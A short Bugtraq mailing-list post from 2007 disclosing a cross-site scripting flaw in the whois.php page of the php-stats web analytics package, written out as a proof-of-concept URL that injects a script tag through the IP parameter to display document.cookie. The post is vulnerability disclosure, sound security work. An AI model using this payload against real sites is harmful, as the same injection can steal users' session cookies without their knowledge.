[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
php-stats xss whois.php
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: php-stats xss whois.php
- From: vasodipandora@xxxxxxxxx
- Date: 11 Aug 2007 14:21:06 -0000
I have found an xss in whois.php page of php-stats.
http://phpstats.net/
Here is the XSS
php-stats-path/whois.php?IP=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E